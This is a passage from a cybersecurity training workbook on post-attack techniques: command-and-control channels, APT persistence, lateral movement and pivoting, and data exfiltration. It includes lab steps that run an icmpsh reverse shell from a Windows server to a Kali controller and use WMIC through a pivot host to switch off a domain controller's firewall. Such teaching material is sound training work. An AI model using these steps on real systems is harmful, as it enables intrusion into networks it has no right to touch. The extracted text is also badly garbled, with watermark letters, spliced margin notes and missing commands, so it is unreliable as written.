you prematurely terminate your threat assessment efforts, they'll have gone to waste.
Instead, you need to hone your focus on what an attacker does after an attack that can inflict
e
long-lasting harm on your organization.
at
Lesson Objectives
lic
TOPIC A
Assess Command and Control Techniques
In this topic, you'll assess how attackers can continue to serve malicious software to victims through
a coordinated and highly connected network of servers and botnets.
e
Command and Control
ut
Command and Control In cybersecurity, command and control (C&C) refers to an infrastructure of computers with
Throughout this lesson, which attackers direct, distribute, and control malware. This is made possible primarily through
ib
consider pointing to coordinated botnets—after compromising systems and turning them into zombies, the attacker adds
specific Common these systems to an ever-growing pool of resources. The attacker then issues commands to the
Vulnerabilities and resources in this pool. A command can be a simple ping or heartbeat to verify that the bot is still
tr
Exposures (CVE), alive in the botnet—a process called beaconing—or the issued command can be more malicious
Common Weakness (for example, attempting to infect any computers the bot is connected to in a network).
is
Enumeration (CWE™),
and Common Attack C&C servers are difficult to pin down because they frequently change Domain Name System (DNS)
Pattern Enumeration names. Dynamic DNS registration helps attackers avoid detection, as does using many hosts in
D
and Classification issuing commands to the zombie computers. This is particularly problematic in organizations that
(CAPEC™) entries that have hundreds or even thousands of devices connected on a network. Each one is a potential attack
demonstrate the real- surface for a C&C operation to start with, and then the attack can spread exponentially throughout
world impact of these
attacks and their related
vulnerabilities. Some
examples are provided
without the organization even knowing.or
the organization. Most successful C&C operations manage to snare bots in a private network
e
for you in content
delivery tips.
at
lic
up
D
In issuing commands, the C&C server must find a channel to communicate over. The channels that
attackers use can vary, and each may have their own strengths and weaknesses. Examples of
N
channels include:
• Internet Relay Chat (IRC)
o
• HTTP/S
• DNS
D
e
directives to individual bots connected to the IRC server. Other channels will generally require
ut
additional development and scaling to provide full control to the C&C server, but with IRC, it takes
very little effort. This is because IRC infrastructure supports a great deal of flexibility in the types of
commands that can be sent to a server by a client. For example, the C&C server could issue a
ib
command to its zombie IRC clients that forces them to download new malicious software. The
malware update propagates through the IRC clients quickly and easily.
Despite its popularity in years past, use of IRC as a C&C channel is on the decline, as is IRC use in
tr
general. IRC traffic is relatively easy for administrators to detect, and many organizations have no
use for this protocol, so they simply block all such communications. This has motivated C&C
is
operators to turn elsewhere for their communication needs, but some still maintain a significant and
harmful presence in IRC.
D
HTTP/S
or
Unlike IRC, communication over HTTP and HTTPS is still a necessity in almost every
organizational network, and blocking these protocols entirely is simply not feasible. Additionally, it's
difficult to separate malicious traffic from legitimate traffic, so attackers are finding these web-based
HTTP/S
e
protocols more viable channels for their C&C communications.
When used in C&C, HTTP/S servers are not as flexible as IRC. Out-of-the-box web servers don't
at
typically afford the C&C server much interactive control with its messages, so the server may need
to upload text files to multiple web servers as a way to communicate with its bots. The bot connects
lic
to one or more of these web servers to receive its orders from the text file. The text file may, as
before, instruct the bot to update its malicious software. The process is less streamlined than with
IRC, but attackers can still find success. If the attacker takes the time to program more interactivity
into the web server backend, they may be able to match IRC's full control capabilities.
up
Although administrators can take steps to mitigate HTTP/S C&C operations by blocking known
malicious domains, as explained before, attackers are able to change domains more quickly than
many administrators can keep up with.
D
DNS
ot
Another channel for C&C communication on the rise is the DNS protocol. Because DNS traffic is DNS
not inspected or filtered in most private networks, attackers see an opportunity for their control
N
messages to evade detection. Using DNS, attackers send their commands in either request or
response queries to bots that share usage of the same name servers or delegation path. This typically
makes the queries longer and more complicated than average, because the C&C directive needs to
o
fit with the DNS format. While this can be challenging, and certainly doesn't offer the same
flexibility as IRC, attackers are able to exploit organizations that don't continuously monitor their
D
name servers.
To evade detection when DNS servers are monitored, attackers break their control messages into
several different query chunks so as not to trip sensors that only look at individual transmissions.
Another sign of a C&C operation through DNS is when the same query gets repeated several times;
this indicates that the bot is checking into the control server for more orders.
DNS as a C&C channel is also effective because the bot doesn't even need to have a direct
connection to outside the network. All it needs to do is connect to a local DNS server that executes
lookups on authoritative servers outside the organization (like those on the Internet), and it can still
receive a response with a control message.
ICMP
ICMP Although not as common as other methods, C&C operations can use Internet Control Message
Protocol (ICMP) as their chosen communications channel. The bot can ping its C&C controller and
e
ask for orders, and the controller can respond with its commands. Each of these transmissions is
ut
done in a single ICMP packet. Because ICMP packets are relatively small and used primarily to
check the status of other hosts on a network, the most obvious C&C message to use is a simple
check to see if the bot is still active.
ib
Advanced messages like file transfers and remote shells are much more difficult to execute in ICMP
constraints, but may still be possible. This is not ideal for attackers who need a high degree of
tr
reliability in their operations, but some may use ICMP simply because it's not commonly thought of
as a vector for advanced C&C operations. However, there are plenty of reasons why an attacker may
not bother with ICMP. First, many organizations simply block inbound traffic on this protocol
is
because of its popular use in distributed denial of service (DDoS) attacks. Second, administrators
may set a baseline for ICMP packet sizes, and if they notice a packet size above or below the
D
baseline, it may trigger an alert. And third, ICMP packets are not encrypted, and monitoring services
can easily inspect them for abnormal contents.
Additional Channels
Additional Channels or
The following table lists some additional and custom channels that C&C operations can use.
e
C&C Channel Description
at
Social media websites Facebook, Twitter, and LinkedIn have all been vectors for C&C
operations. Social media platforms like these are a way for the attacker to
lic
and issue commands to bots through the account's profile, using fields
like employment status, employment history, status updates, and more.
Similarly, there is evidence that a C&C operation used random Twitter
accounts to post seemingly random hashtags. These hashtags were
D
actually encoded, and bots would scour Twitter messages for these
hashtags to receive their orders. Over the years, social media sites have
gotten better at shutting down C&C operations.
ot
Media files Media file formats like JPEG, MP3, and MPEG use metadata to describe
images, audio, and video. This is especially prevalent in digital cameras,
N
detection.
e
Peer-to-peer (P2P) Although most C&C networks have a centralized configuration, some
ut
networks attackers have seen value in decentralizing to more effectively evade
detection and shutdown. In most cases, the C&C server is a single point
of failure. Although this is mitigated somewhat by backups and dynamic
ib
DNS registration, it still poses a challenge for attackers. Therefore,
attackers use peers in a P2P network to distribute controllers among
many hosts. If one or a group of peers is taken down, the botnet may still
tr
be able to function, and C&C operations continue unabated. The major
downside for an attacker is that P2P networks are hard to establish.
is
Cloud services Cloud companies that provide a wide variety of services, especially
infrastructure and platform services, are also at risk of being C&C
D
vectors. For example, attackers used the Google App Engine™ platform
to send C&C messages to bots through a custom application hosted by
the service. App Engine is attractive to attackers because it offers free,
or
limited access to the service. Instead of incurring the cost of setting up
their own servers, attackers use a cloud company's reliable and scalable
infrastructure to support their C&C operations.
e
at
lic
up
D
ot
N
o
D
ACTIVITY 5-1
Assessing Command and Control Techniques
Data File
e
/home/kali/Desktop/icmpsh.zip
ut
C:\CNX0013Data\Analyzing Post-Attack Techniques\icmpsh.zip
Activity: Assessing
Command and Control Before You Begin
ib
Techniques
You'll be using your Kali Linux™ virtual machine (VM) as a controller, and your Windows Server®
as a bot. The program you'll use to initiate these C&C communications is called icmpsh.
tr
Scenario
is
You want to begin assessing how attackers may still compromise your machines even after the main
attack has concluded. In particular, attackers can turn your hosts into zombies they control, and use
D
them for a variety of malicious purposes. You're familiar with C&C over IRC, so you've taken
measures to block that protocol entirely. However, you want to see how a more common and
necessary channel can be used in C&C operations.
This command disables normal ICMP responses so the victim can more easily listen to commands
from the controller.
N
This starts the master system (controller) listening for the slave (bot) response.
D
d) Check C:\Temp\icmpsh-master and verify that icmpsh.exe is listed. If it isn't extract the icmpsh.zip
file again.
e) Return to your Kali Linux VM and open a second terminal, keeping the icmpsh terminal running.
f) At the prompt, enter ssh Administrator@10.39.5.# where # corresponds to your server's IP
address.
g) Enter the password you cracked earlier (Pa22w0rd).
h) At the SSH prompt, navigate to the server's C:\Temp\icmpsh-master directory.
i) Enter icmpsh -t 10.39.5.# where # corresponds to your Kali Linux VM's IP address.
j) Switch back to your original terminal window and verify that you can see the C:\Temp\icmpsh-
e
master prompt.
ut
ib
tr
is
4. Send commands from your controller to your bot and capture the traffic.
D
a) In Kali Linux, from the menu bar, select Applications→Sniffing & Spoofing→wireshark.
b) Start a capture on eth0.
c) Switch to the terminal with the icmpsh C:\Temp\icmpsh-master prompt and run some common
®
Windows commands such as dir, ipconfig, and arp -a.
d) Return to Wireshark and stop the capture. or
e) Add the following filter in Wireshark: icmp.type==8 && ip.len > 60
This filters the capture by ICMP echo requests with data payloads. These echo requests are coming
e
from your Windows Server.
at
f) Examine the captured packets and note the responses to your commands sent over ICMP.
lic
up
D
ot
A: Answers will vary. Blocking outbound ICMP traffic is an option, but it limits your ability to diagnose
network problems through ping and traceroute. Stateful filtering of this traffic will not be
useful, as there is no state to filter. Application-layer firewalls also tend to ignore ICMP. However,
packet inspectors may be able to review ICMP traffic for unusual behavior, such as the messages'
length or contents. The fact that Windows Security identified the bot executable as malicious is
promising, but it won't necessarily detect every possible payload.
7. What other methods of command and control could an attacker use to evade
your security?
A: Answers may vary, but should at least include mention of HTTP/S and DNS. These are very
difficult to detect and stop because they blend into normal traffic.
e
c) At any terminal, enter sudo sysctl -w net.ipv4.icmp_echo_ignore_all=0 to reset the
ICMP configuration.
ut
d) Close both terminals.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC B
Assess Persistence Techniques
In this topic, you'll assess how attackers can maintain access once they've breached a system or
network.
e
Advanced Persistent Threat (APT)
ut
An advanced persistent threat (APT) is a threat that continually exploits a target while remaining Advanced Persistent
undetected for a significant period of time. APTs typically target large organizations to covertly Threat (APT)
ib
compromise their business efforts. Financial institutions, companies in health care, and other CrowdStrike (https://
organizations that store massive quantities of personally identifiable information (PII) are the most www.crowdstrike.com)
common victims of an APT. APTs have also targeted governments to carry out political objectives and FireEye (https://
tr
or simply as a way to spy on another country. Most APTs are usually not individual attackers, but a www.fireeye.com/) are
group of highly technical people that work toward a clearly defined goal. two online services that
is
compile information
The "advanced" part of an APT is an important identifier, as these types of threats are very rarely about known APT
executed by lone, unskilled attackers using pre-baked exploits. Instead, APTs spend considerable groups. Consider
D
effort in gathering intelligence on their target, and are able to craft highly specific custom exploits demonstrating them.
that even cybersecurity professionals may have a difficult time detecting. Another characteristic of
the advanced nature of APTs is that they often combine many different attack elements into an
overall threat architecture.
or
There are several possible use cases for an APT, but since a large part of the attack is about stealth,
most APTs are interested in maintaining access to networks and systems. There are several
e
techniques that can grant attackers access for months or even years on end without being detected.
Because of this, APTs are some of the most insidious and harmful threats to an organization.
at
Rootkits
lic
Rootkits, because they work at such a low level on a compromised host and are adept at concealing Rootkits
malicious code, are a staple of APTs. The power of rootkits is they can alter an operating system's
up
kernel or a device's firmware to mask just about any type of activity desired. For example, they can
take over the core parts of an OS to hide running processes, services, or files from security
mechanisms like anti-malware and intrusion detection systems (IDSs). In this sense, the rootkit isn't
executing the direct attack, but simply makes way for other malicious code to run undetected. A
D
Trojan horse by itself may be instantly identified by a real-time anti-malware scanner because it can't
change the OS's fundamental behavior. A rootkit installed beforehand, however, has complete
access to the lowest levels of the OS and can manipulate it into hiding the Trojan from the scanner.
ot
Aside from Trojan horse malware, APTs use rootkits to hide keyloggers, malicious drivers, botnet
controllers, and backdoors. They often rely on convincing privileged users to install the software on
N
scan for it. Some software programs can detect known rootkit signatures, but these are not always
adequate solutions.
D
e
ut
ib
tr
is
D
or
e
Figure 5-2: Anti-malware software detecting a rootkit.
at
More on Keylogging
lic
Keyloggers can use rootkits as a persistence vector, but some software-based keyloggers are a
component of more surface-level malware like worms and viruses. There are also hardware-based
keylogging tools that can enable an attacker to extract a user's keystrokes. These are often
implemented as a small device plugged into a host's interface, such as a USB port. These devices
up
incorporate a microcontroller that listens on the data stream between keyboard and CPU, and stores
captured keystrokes on the device's memory chip. For an attacker, a hardware keylogger has the
advantage of bypassing the OS and firmware and capturing all keystrokes when the computer is
D
powered on. A hardware keylogger may be easy to spot during an inspection of the physical
computer, but it can also blend into the physical environment and be difficult for an everyday user
to notice.
ot
Backdoors
N
Backdoors A backdoor is a way for an attacker to bypass authentication methods to gain access to a system.
Backdoors are commonly enabled as part of rootkit behavior—the rootkit hides a running process
o
that grants a remote attacker access to the operating system. Software backdoors are usually just
remote control software that opens a channel for the attacker to execute commands through. Using
D
this channel, the attacker can take advantage of the rootkit's elevated privileges and concealment to
establish an access point that is hard to detect, much less remove.
APTs will typically install backdoors as part of the attack process, only to truly leverage their
potential during the post-attack process, when the organization feels it has successfully recovered
from the incident. A successful APT will use the access afforded by the backdoor sparingly; even if
the computer itself can't detect the backdoor because of a rootkit, users and security professionals
may notice odd behavior that could tip them off. Unexplained slow network speeds and missing or
altered files/configurations are usually the signs of stealth access.
Software is not the only backdoor vector that APTs can take. There have been several initiatives by
vendors and governments to install backdoors into the manufacturing phase of hardware
development. These backdoors enable someone with secret knowledge of them to access any
hardware platform that has that particular backdoor. If an APT is able to obtain this knowledge, it
could conceivably have unlimited access to a device even when that device's software has been
wiped clean. This is very difficult for security professionals to counter, as they are typically not given
backdoor access to the hardware they buy, which can put the APT at a major advantage.
e
ut
Logic Bombs
An APT can automate its post-attack processes by installing logic bombs on a target system. This is Logic Bombs
ib
useful to the APT because nothing suspicious will happen until the right condition is met, especially
if the logic bomb is concealed by a rootkit. So while indiscreet use of a backdoor can make a user
tr
suspicious, an effective logic bomb will not.
Logic bombs are typically triggered at a certain time or due to a certain event, whichever the APT
is
configures. An APT can use a logic bomb as a method of misdirection—after an attack, the incident
responders may not consider the incident fully eradicated until they carefully monitor the affected
systems for several months after the attack. After no further activity is detected, the responders
D
consider the incident closed. However, the logic bomb is still set to go off in the future, and lies
dormant on the compromised systems until that date comes.
or
APTs can use logic bombs with any number of payloads. They can simply make the payload a
backdoor, or it can have a more immediate and devastating effect. For example, the logic bomb
could wipe an entire drive's worth of sensitive company data, triggering when a specific employee
logs in. This not only accomplishes the APT's goal of data destruction, but it can also frame that
e
particular employee as the perpetrator.
at
Rogue Accounts
lic
Rather than taking the malicious software route, an APT may want to actively try to avoid anti- Rogue Accounts
malware scanners as part of its post-attack process. Rogue accounts present an opportunity for the Example CVE ID:
APT to maintain access while injecting no illegitimate code on the target systems at all. The CVE-2013-3612.
up
compromised account is trusted by the operating system in accordance with the privileges it has
assigned. On a system with hundreds, or maybe thousands of accounts, any one account can easily
get lost in the shuffle.
D
With this rogue account in place, the attacker may be able to remote into the system and access
sensitive information. If the rogue account has sufficient privileges, the APT may be able to change
or delete files. As long as the target system is up and running, and remote protocols are active, the
ot
use these credentials directly. After all, even if the user is tricked into giving them out, the user will
still probably watch the account for whatever it is the social engineer has promised would happen
(e.g., in a quid pro quo). Instead, the APT could use these credentials to create a new account or
o
modify an existing one, give that account a certain amount of privileges, and then let it stay dormant
D
until it's needed. The pitfall for the APT is that most organizations log account creation and use on
critical hosts, and an alert could be generated by this activity.
ACTIVITY 5-2
Assessing Persistence Techniques
Scenario
e
Activity: Assessing You and your team are concerned about possible hidden malware on your client machines left over
Persistence Techniques from an attack. This malware can stealthily wreak havoc on your systems, and is difficult for even
ut
standard anti-malware solutions to detect. So, you'll take steps to identify any persistent malicious
software on your systems.
ib
1. One of your colleagues suggests using typical anti-malware software like
tr
Windows Security to scan for rootkits.
Why might this approach not be 100% effective?
is
A: Answers may vary, but rootkits infect a device at its lowest levels, including being able to alter the
fundamental behavior of the operating system itself. Therefore you cannot always trust an anti-
D
malware scan that's running on the operating system to accurately detect a rootkit.
If necessary, remind
students of the different 3. What does the threat profile of a successful APT usually look like?
lic
components of a threat
profile: actor type, A: Answers may vary, but APTs are usually launched by multiple experienced cybercriminals, state-
motivation, intent, target, sponsored hackers, or other skilled attackers because of the difficulty in remaining stealthy for
vector, and technique long periods of time. There are many potential motives behind APTs, including a desire for money
up
criteria. and association with a larger group. Likewise, the intent of an APT can vary, though it often
centers on theft, espionage, or denial of service.
D
ot
N
o
D
TOPIC C
Assess Lateral Movement and Pivoting
Techniques
In this topic, you'll assess how attackers can move deeper into your network and systems after
e
they've launched the first salvo of their attack.
ut
Lateral Movement
ib
Lateral movement is the process by which an attacker is able to move from one part of a Lateral Movement
computing environment to another. Rather than target the deepest parts of an environment Example CAPEC ID:
immediately, the attacker can gain entry to a more easily accessible endpoint at the perimeter. From CAPEC-564.
tr
there, they can move laterally to different systems without arousing suspicion. Lateral movement can
therefore be used as part of an APT, in that the attackers can go from one point to another without
is
tripping any alerts. This is because effective lateral movement is often indistinguishable from
legitimate traffic—the attacker does not necessarily direct their attack at specific targets, but
D
stealthily spreads out through the environment, testing various systems for their potential as a
vector.
There are several techniques that can enable lateral movement, the most necessary of which is
or
reconnaissance. Once the attacker compromises their patient zero host, they'll need to sweep the
network for other hosts, as well as enumerate network protocols, ports, and logical mapping. This
provides them with the information they need to discover where exactly they are, and where exactly
they can move to. From there, they have several different options available to gain access further
e
into the organization's network and systems.
at
lic
up
D
ot
N
o
D
Figure 5-3: An attacker starts at a compromised host and moves to other hosts in the network.
e
authentication caches their credentials as a hash in the Security Accounts Manager (SAM)
ut
database on their computer.
2. The attacker gains administrative access to the victim's computer and dumps the SAM database,
exposing the hash of the victim's password. In this case, "dumping" the SAM database means to
ib
extract the hashes from it using a tool like pwdump, as the SAM database cannot be read
directly.
3. The attacker loads this hash onto other computers in the network and authenticates to the SSO
tr
system, impersonating the victim.
is
D
or
e
at
lic
up
The attacker doesn't even need to crack the hashes—they use them directly to authenticate, making
it much easier for them to compromise hosts in the organization. The attacker's access isn't just
ot
limited to a single host, as they can pass the hash onto just about any computer in the network that
is tied to the domain. This drastically cuts down on the effort the attacker must spend in moving
from host to host.
N
Windows Server 2019 that significantly reduces the efficacy of pass the hash attacks. It uses
virtualization techniques to prevent users, even privileged ones, from reading credential data (e.g.,
D
hashes) stored in memory. Only a new, isolated process on the system is allowed access to this
credential data.
Golden Ticket
A golden ticket, or ticket-granting ticket (TGT), is a Kerberos ticket that has the ability to grant Golden Ticket (2 Slides)
other tickets in an Active Directory environment. Attackers who are able to create a golden ticket The term "golden ticket"
can use it to grant administrative access to other domain members, even to domain controllers. This is usually used to refer
can potentially enable an attacker to compromise the organization's entire forest. to a forged ticket-
granting ticket (TGT)
Attackers create golden tickets by gaining access to the krbtgt hash, typically by dumping the rather than a TGT used
Active Directory® (AD) data store. The krbtgt is the trust anchor of the Active Directory domain, for its intended purpose.
fulfilling a similar role as the private key of a root certificate authority. The krbtgt generates TGTs
e
that enable users to access services with Kerberos. With this compromised, the attacker essentially
ut
has total control over a domain. An example of the golden ticket attack process is as follows:
1. An attacker gains access to the NTDS.DIT file that contains the Active Directory data store.
2. The attacker dumps the NTDS and identifies the hashes of various administrator accounts, as
ib
well as the krbtgt.
3. The incident response team detects the breach and forces Active Directory users to reset their
tr
passwords, but they don't reset the krbtgt.
4. The attacker, using the still valid krbtgt hash, uses an exploit module to create a golden ticket
is
for a user in the administrator group. The user doesn't even need to exist in the directory.
5. The attacker uses the golden ticket to assume an administrative identity and compromise the
domain controller (DC). From there, the user opens a shell onto the DC and executes any
D
administrator-level command they choose.
or
e
at
lic
up
D
ot
N
A golden ticket attack can enable an attacker to move across an entire forest after the main attack
o
has concluded. Even if the incident response team detects the main attack and contains it, the
organization is still susceptible to lateral movement within its various domains.
D
the remote host they're targeting. Protocols like this also need to be installed and enabled on the
target machine to function properly. Windows systems, for instance, do not come with Telnet
installed.
Aside from simple remote shells like Telnet, attackers may also use graphical remote desktop
protocols when available. Protocols like Windows Remote Desktop and Remote Assistance can
provide the attacker with access to a target machine from the perspective of a normal, everyday user.
Like Telnet, these protocols need to be enabled on the target machine first, which can hamper the
attacker's movement. However, when it comes to user workstations, remote desktop services are
much more commonly used than command-line shells, so there's a greater likelihood that these
e
services will be enabled and allowed at the firewall.
ut
As you'll see, not all remote access services need to be overtly enabled on the target computer to
work.
ib
tr
is
D
or
e
at
lic
up
D
WMIC
ot
WMIC The Windows Management Instrumentation Command-line (WMIC) tool provides users with
N
a terminal interface into the operating system's WMI. WMI obtains management information and
notifications from both local and remote computers, and enables administrators to run scripts to
manage those computers. The latter function is actually WMI's most commonly used—
o
administrators write scripts in a language like VBScript to manage remote hosts over a network. For
example, administrators can automate starting and stopping processes on a remote machine.
D
Although the admin could log in to Remote Desktop to start and stop the processes manually, the
automated script streamlines this task.
Note: WMI uses the Common Information Model (CIM), an industry standard that defines how
devices, applications, and other computer components are represented as related objects.
Because of its ability to manage remote hosts, WMIC can be a vector in post-attack lateral
movement. With one host compromised, the attacker can open a channel on other hosts by starting
certain processes or stopping processes that interfere with their attack. Using WMIC, the attacker
can also assume the identity of another user if they know that user's credentials. This can help the
attacker perform tasks that require a higher level of privileges than the default given.
e
ut
Figure 5-7: Using WMIC to open a network share on a remote server.
ib
Aside from direct control, the attacker can also obtain crucial reconnaissance from a remote host
using WMIC. Everything from processes to drive partitions to BIOS data, and more, is information
WMI can obtain on the user's behalf.
tr
PsExec
is
PsExec was developed as an alternative to Telnet and other such remote access services. Whereas PsExec
D
Telnet and similar services require the user sets up and installs the service on the remote machine,
PsExec is designed to be a quicker, more out-of-the-box approach to remote access. Executing the
PsExec program from the local machine is all that is required. PsExec also provides more advanced
or
features, such as enabling the administrator to authenticate to remote systems with multiple
credentials, rather than just their own. Because it's simple to set up and offers powerful features,
PsExec is often favored by administrators looking to quickly manage a remote system.
e
Likewise, for the same reasons, it's also a popular vector for post-attack movement. For example,
assume an attacker has user credentials on their target system, but can't directly access the command
at
line or any GUI interface on the remote machine. In order to move laterally to that machine, they'll
need to find some way to open their target up to attack. Using PsExec, they can use a malicious file
lic
on their local machine (which they've already compromised), and run that file on the remote
machine they're targeting. If this malicious file opens a backdoor, then they can now elevate their
privileges and directly control the target system.
up
D
ot
N
Figure 5-8: Using PsExec to run a malicious file on a remote computer that opens port 1111 on
the firewall.
o
Attackers can also use the -s option in PsExec to start processes using the built-in Windows
D
SYSTEM account. The SYSTEM account has complete access to the operating system, even more
so than an administrator.
Note: The "Ps" in PsExec refers to the Unix command ps, which lists process information.
Pivoting
Pivoting Pivoting is a process similar to lateral movement. In lateral movement, an attacker hops from one
host to another in search of vulnerabilities to exploit. When an attacker pivots, they compromise
one host (the pivot) that enables them to spread to other hosts that would otherwise be inaccessible.
For example, if you are able to open a shell on a host, you can enter commands in that shell to see
other network subnets the host might be connected to. The attacker can move to a different
network segment than the one they're already using to connect to the host.
e
Note: Despite the distinction, lateral movement and pivoting are often used interchangeably.
ut
Port Forwarding One use for pivoting is port forwarding. In port forwarding, the attacker uses a host as a pivot and
is able to access one of its open TCP/IP ports. The attacker then forwards traffic from this port to a
ib
port of a host on a different subnet using pivoting methods.
For example, assume the attacker's host (Host A) has compromised another host in the network,
tr
Host B. Host B is not their ultimate destination; they want to take control of Host C, which they
can't reach directly from their attack machine (perhaps because it's blocked by a firewall). Host B,
however, can reach Host C. The attacker knows Host C has Windows Remote Desktop enabled, and
is
wants to exploit that. So:
1. The attacker opens an exploit shell onto Host B and forwards port 3389 to Host C.
D
2. The attacker then uses their attack machine to connect to Remote Desktop at localhost:3389,
which gets forwarded to and opens a remote session on Host C, their ultimate target.
or
e
at
lic
up
D
ot
N
VPN Pivoting
D
VPN Pivoting (2 Slides) One type of pivoting attack involves VPN communications. If the attacker is able to compromise a
host inside a private network, they can run an exploit payload on that host that starts a VPN client
on its network interface. Meanwhile, the attacker runs a VPN server outside the network, and relays
frames of data from that server to the client. The data frames are dumped onto the client and can
now interface with the wider private network. Any traffic that the client (pivot host) sees can then
be relayed back to the attacker's VPN server.
The actual composition of these data frames can vary, but attackers commonly use VPN pivoting to
perform reconnaissance of the target network. Once they've established their virtual connection
from attacking host to pivot target, the attacker can scan the private network for vulnerabilities and
enumerate hosts using the compromised pivot machine. This exposes the network to any number of
continued attacks, and the attacker may be able to pivot to mission-critical hosts like a domain
controller.
e
ut
ib
tr
is
D
or
e
at
Figure 5-10: Using a VPN to pivot from a compromised host to a domain controller.
lic
SSH Pivoting
After an attacker compromises a host, they can also pivot to other hosts using Secure Shell (SSH) SSH Pivoting (2 Slides)
tunnels. The attacker connects to the compromised pivot through SSH using the -D flag. This flag
up
sets up a local proxy server on the attacker's machine, as well as enables port forwarding.
Connections to this proxy on the port specified are forwarded to the ultimate target through the
pivot. For example, the attacker sets up the proxy on Host A using port 8080. They then SSH into
D
Host B (the pivot), and any traffic sent through port 8080 is forwarded to port 8080 on Host C (the
ultimate target).
SSH pivoting enables an attacker to compromise a host they can't reach directly by using an
ot
intermediary host (the pivot). The attacker can craft an exploit package to take ownership of the
unreachable host. Additionally, the attacker can chain proxy servers together to continue pivoting
from host to host, until they reach a DC or another mission-critical host.
N
o
D
e
ut
ib
Figure 5-11: The firewall blocks direct access to Host C, but the attacker uses SSH to make Host
tr
B a pivot.
is
Routing Tables and Pivoting
D
Routing Tables and After opening a shell on the pivot host, the attacker can also add a new route to the pivot host's
Pivoting routing table. This new route includes a destination subnet and a gateway. The attacker defines the
gateway as their own exploit session, so any traffic sent to the subnet must tunnel through the
or
attacker's session. This can enable an attacker to use the pivot as a way to reach different subnets.
For example, the attacker's Host A and the compromised pivot (Host B) may be on the
192.168.10.0/24 subnet, whereas the attacker's ultimate target (Host C) is on the 10.39.5.0/24
subnet. The attacker can't see Host C from Host A. Host B, however, can see Host C. If the attacker
e
adjusts Host B's routing tables to add an entry that routes 10.39.5.0/24 traffic through their exploit
at
Figure 5-12: An attacker routing traffic on a different subnet through a pivot host.
o
D
ACTIVITY 5-3
Assessing Lateral Movement and Pivoting
Techniques
e
Before You Begin
ut
You'll be using all three of your machines in this activity.
Activity: Assessing
ib
Scenario Lateral Movement and
Pivoting Techniques
Through your team's security efforts, attackers are often cut off at certain critical endpoints.
However, your endpoints are still open to other "safe" hosts in the network. An attacker can take
tr
advantage of these hosts to pivot and move laterally to your more valuable targets. In this activity,
you'll assess how pivoting can overcome certain security measures. Your Kali Linux VM cannot
is
access your Windows Server machine directly anymore, but you'll take a different route to get to the
domain controller—using the Windows 10 client as a pivot.
D
1. Prepare your Windows Server domain controller to reject all contact from your
Kali Linux VM.
or
a) On your Windows Server machine, from Server Manager, select Tools→Windows Defender Firewall
with Advanced Security.
e
b) From the console tree, select Inbound Rules.
c) From the Actions pane on the right, select New Rule.
at
d) In the New Inbound Rule Wizard, select the Custom radio button, and then select Next.
e) Select Next to accept the Program defaults, and select Next to accept the Protocols and Ports
lic
defaults.
f) On the Scope page, in the Which local IP addresses does this rule apply to? section, select the
These IP addresses radio button and select Add.
g) In the IP Address dialog box, in the This IP address or subnet text box, enter your Windows Server's
up
i) On the Action page, select Block the connection and select Next.
j) On the Profile page, select Next to accept the defaults.
k) Name the rule No Kali Linux, and then select Finish.
ot
e
ut
ib
The ping should succeed.
tr
a) In a Kali Linux terminal, enter ssh Administrator@10.39.5.#, where # corresponds to your
is
Windows 10 client's IP address.
D
and not the server. The client also has an OpenSSH server set up and is
accepting domain credentials.
b) Enter yes to continue.
If students mistype
something in the SSH
c) Enter the password.
or
d) At the prompt, enter echo %logonserver%
This command reveals the computer name of the domain controller that the Windows 10 domain
e
connection, they may member is connected to.
need to execute the e) Verify that your domain controller's computer name is listed.
at
f) At the prompt, enter ping <computer name>, using the name you just enumerated.
up
An attacker won't necessarily know the IP address of their target, so this helps them discover it.
N
If students are seeing an call create "cmd.exe /c netsh advfirewall set allprofiles state off"
RPC server is Ensure that you're replacing <IP address> with the Windows Server IP address you matched
unavailable error, ensure previously.
the Windows Firewall
Remote Management This command uses WMIC to completely disable the firewall on the Windows Server domain
rules are enabled on controller.
their Windows 10 client's
firewall, as per the
course setup.
e
ut
c) Press Ctrl+C to exit the SSH session.
ib
d) At the terminal prompt, enter ping 10.39.5.# where # corresponds to your Windows Server's IP
address.
tr
e) Verify that the ping succeeds.
Your Windows Server domain controller is now vulnerable to direct compromise from your Kali Linux
VM, among other security issues that come with an inactive firewall.
is
f) Press Ctrl+C to stop the ping.
D
5. Revert the DC's firewall back to its active state.
a) Return to your Windows Server machine.
b) Right-click the Start button and select Windows PowerShell (Admin).
c)
d)
e)
or
At the prompt, enter netsh advfirewall set allprofiles state on
Enter netsh advfirewall firewall delete rule name="No Kali Linux"
Close PowerShell and any other open windows besides Server Manager.
e
at
lic
up
D
ot
N
o
D
TOPIC D
Assess Data Exfiltration Techniques
Access is not the be-all and end-all for many attackers. Rather, their ultimate goal is often to steal
sensitive data from the organization. In this topic, you'll assess how attackers can leak data out of
your organization even after you think the intrusion has been dealt with.
e
ut
Data Exfiltration
Data Exfiltration The malicious transfer of data from one system to another is called data exfiltration. In a post-
ib
Example CAPEC IDs: attack scenario, attackers are able to stay hidden on compromised systems even after the main
CAPEC-511 and incident has concluded. Whether by lateral movement, pivoting, or any other APT technique, the
CAPEC-537. attacker gains access to private data that could put the organization in jeopardy if it were captured by
tr
unauthorized users.
is
Although exfiltration can be largely mitigated through data loss prevention (DLP) solutions and
strong encryption of sensitive data, it may not always be feasible for an organization to ensure that
every potential point of data undergoes encryption. What's more, an attacker who gains access to
D
administrative or other privileged credentials may be able to decrypt that data without much further
effort. Another potential vulnerability concerns how the organization is encrypting their data—do
they encrypt data only when it's in storage? If so, what's to prevent the attacker from capturing the
or
unencrypted data as it's in transit from a workstation to a remote database? Attackers have several
stealthy approaches available to them to take advantage of these opportunities.
e
Covert Channels
at
Covert Channels Data exfiltration procedures that use covert channels are able to transmit data outside the network
without alerting any intrusion detection or data loss countermeasures. The specific channel the
lic
attacker takes will differ from situation to situation, but all covert channels share a common
element: they enable the stealthy transmission of data from node to node using means the
organization's security controls do not anticipate.
up
• Breaking the data up into multiple packets to be sent at different times to evade signature
analysis.
• Transmitting data over a shared resource that is not typically used as a communication channel
ot
Advanced IDSs may be able to detect some of this behavior, but in many cases, it's difficult for
automated systems to accurately account for all possible covert channels that an attacker could use.
It's not necessarily feasible for the organization to store and manually analyze all its outbound traffic
o
data, either.
D
Steganography
Similar to using a covert channel, one technique for hiding data for exfiltration is steganography. Steganography
Using steganography, an attacker might be able to evade intrusion detection and data loss
countermeasures if they hide information within images or video. Modern tools hide digital
information so well the human eye cannot tell the difference; likewise, computer programs not
equipped for steganographic analysis may also fail to spot the hidden information.
